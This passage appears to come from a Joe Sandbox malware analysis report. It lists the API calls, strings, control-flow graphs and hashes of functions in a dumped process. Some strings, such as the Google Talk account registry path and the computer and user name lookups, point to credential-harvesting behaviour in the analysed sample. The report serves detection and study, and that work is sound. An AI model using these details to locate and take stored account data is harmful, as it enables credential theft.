                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 365 4034d6-403536 memset * 2 call 410493 368 403572-403574 365->368 369 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 365->369 369->368
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                                                                                                                          • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                          • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 374 40c9f7-40ca26 ??2@YAPAXI@Z 375 40ca28-40ca2d 374->375 376 40ca2f 374->376 377 40ca31-40ca44 ??2@YAPAXI@Z 375->377 376->377 378 40ca46-40ca4d call 40400d 377->378 379 40ca4f 377->379 381 40ca51-40ca77 378->381 379->381 383 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 381->383 384 40ca79-40ca80 DeleteObject 381->384 384->383
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                                                          • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                          • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408392
                                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                          • API String ID: 2959138223-1079885057
                                                                                                                                                                                                                          • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                          • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 414 40b783-40b795 415 40b7e2-40b7f6 call 406a00 414->415 416 40b797-40b7ad call 407baf _mbsicmp 414->416 438 40b7f8 call 410411 415->438 439 40b7f8 call 404780 415->439 440 40b7f8 call 403c03 415->440 441 40b7f8 call 410166 415->441 442 40b7f8 call 40472f 415->442 421 40b7d6-40b7e0 416->421 422 40b7af-40b7c8 call 407baf 416->422 421->415 421->416 428 40b7ca-40b7cd 422->428 429 40b7cf 422->429 423 40b7fb-40b80e call 407bbf 430 40b810-40b81c 423->430 431 40b855-40b864 SetCursor 423->431 432 40b7d0-40b7d1 call 40b340 428->432 429->432 433 40b833-40b852 qsort 430->433 434 40b81e-40b829 430->434 432->421 433->431 434->433 438->423 439->423 440->423 441->423 442->423
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                                                                                                                          • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                          • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                                                          • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                          • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                          • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                                                          • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                          • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                          • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                                                          • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                          • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                          • String ID: Arial
                                                                                                                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                                                                                                                          • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                          • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                          • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                                                          • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                          • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                          • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                          • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                                                          • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                          • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                                                          • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                          • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                          • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

